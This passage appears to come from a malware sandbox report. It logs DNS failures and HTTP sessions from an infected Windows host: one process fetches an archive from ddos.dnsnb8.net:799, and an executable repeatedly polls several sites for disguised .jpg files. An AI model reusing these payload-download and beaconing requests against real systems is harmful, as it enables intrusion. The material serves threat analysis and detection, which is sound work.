                                  Jul 5, 2024 08:04:20.889190912 CEST1.1.1.1192.168.2.90x4a41Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:23.782605886 CEST1.1.1.1192.168.2.90x2488Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:25.033696890 CEST1.1.1.1192.168.2.90xac1dName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:26.716573954 CEST1.1.1.1192.168.2.90x9007Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:28.032803059 CEST1.1.1.1192.168.2.90xf5c0Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:33.560702085 CEST1.1.1.1192.168.2.90x6bc6Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:35.607798100 CEST1.1.1.1192.168.2.90xe271Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:37.182511091 CEST1.1.1.1192.168.2.90x3f7cName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:38.456892014 CEST1.1.1.1192.168.2.90x6530Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:40.491493940 CEST1.1.1.1192.168.2.90x6f1bName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:43.079343081 CEST1.1.1.1192.168.2.90x9b9fName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:45.959526062 CEST1.1.1.1192.168.2.90x59cbName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:49.012496948 CEST1.1.1.1192.168.2.90x678fName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:51.534329891 CEST1.1.1.1192.168.2.90xc9a2Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:54.422445059 CEST1.1.1.1192.168.2.90x6859Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:57.370037079 CEST1.1.1.1192.168.2.90xb388Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:59.317960978 CEST1.1.1.1192.168.2.90x679cName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  • ddos.dnsnb8.net:799
                                  • www.careerdesk.org
                                  • arthur.niria.biz
                                  • apple-pie.in
                                  • ahmediye.net
                                  • ampyazilim.com.tr
                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  0 | 192.168.2.9 | 49706 | 44.221.84.105 | 799 | 7348 | C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:00:56.772121906 CEST | 288 | OUT | GET /cj//k1.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  1 | 192.168.2.9 | 49707 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:00:58.522881031 CEST | 200 | OUT | GET /images/xs.jpg?5e49a2=6179234 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:00:59.278147936 CEST | 671 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:00:59 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159259|1720159259|0|1|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  2 | 192.168.2.9 | 49710 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:00:59.520486116 CEST | 192 | OUT | GET /xs.jpg?60b080=25346560 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:00.022613049 CEST | 662 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:00:59 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159259|1720159259|0|1|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  3 | 192.168.2.9 | 49711 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:00.378371954 CEST | 195 | OUT | GET /images/xs.jpg?63977b=19580529 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:00.866417885 CEST | 410 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:00 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159260|1720159260|0|1|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  4 | 192.168.2.9 | 49712 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:00.929388046 CEST | 188 | OUT | GET /xs.jpg?71a0be=14893436 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:01.582847118 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:01 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  5 | 192.168.2.9 | 49714 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:02.715929985 CEST | 201 | OUT | GET /images/xs2.jpg?84b38e=43483590 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:03.426892042 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:03 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:03.432642937 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:03.653867006 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:03 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:03 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  6 | 192.168.2.9 | 49715 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:04.022066116 CEST | 307 | OUT | GET /images/xs.jpg?e6979d=105784651 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159259|1720159259|0|1|0
                                  Jul 5, 2024 08:01:04.770015001 CEST | 594 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:04 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159264|1720159259|2|2|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  7 | 192.168.2.9 | 49717 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:04.788881063 CEST | 298 | OUT | GET /xs.jpg?10010fa=33563124 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159259|1720159259|0|1|0
                                  Jul 5, 2024 08:01:05.277690887 CEST | 585 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:05 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159265|1720159259|3|2|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  8 | 192.168.2.9 | 49719 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:05.352632046 CEST | 301 | OUT | GET /images/xs.jpg?10da53c=53014452 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159260|1720159260|0|1|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:05.840137959 CEST | 333 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:05 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159265|1720159260|2|2|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  9 | 192.168.2.9 | 49720 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:05.876739979 CEST | 189 | OUT | GET /xs.jpg?1209c47=37828750 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:06.558366060 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:06 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  10 | 192.168.2.9 | 49721 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:06.642554045 CEST | 203 | OUT | GET /images/xs2.jpg?13a89f9=164909000 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:07.349090099 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:07 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:07.376405954 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:07.597104073 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:07 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:07 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  11 | 192.168.2.9 | 49722 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:07.791090965 CEST | 308 | OUT | GET /images/xs.jpg?17b6de9=198930248 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159264|1720159259|2|2|0
                                  Jul 5, 2024 08:01:08.564337015 CEST | 594 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:08 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159268|1720159259|3|3|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  12 | 192.168.2.9 | 49723 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:08.741807938 CEST | 299 | OUT | GET /xs.jpg?1952911=185868151 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159265|1720159259|3|2|0
                                  Jul 5, 2024 08:01:09.288011074 CEST | 585 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:09 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159269|1720159259|3|3|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  13 | 192.168.2.9 | 49724 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:09.303761959 CEST | 302 | OUT | GET /images/xs.jpg?1a33e4b=109902124 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159265|1720159260|2|2|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:09.805706024 CEST | 333 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:09 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159269|1720159260|3|3|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  14 | 192.168.2.9 | 49725 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:09.815491915 CEST | 190 | OUT | GET /xs.jpg?1b6026e=172232340 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:10.472045898 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:10 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  15 | 192.168.2.9 | 49726 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:10.581201077 CEST | 203 | OUT | GET /images/xs2.jpg?1c98993=269866539 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:11.290601969 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:11 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:11.297154903 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:11.528616905 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:11 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:11 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  16 | 192.168.2.9 | 49727 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:11.730487108 CEST | 308 | OUT | GET /images/xs.jpg?20ae1e9=239873375 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159268|1720159259|3|3|0
                                  Jul 5, 2024 08:01:12.493103981 CEST | 594 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:12 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
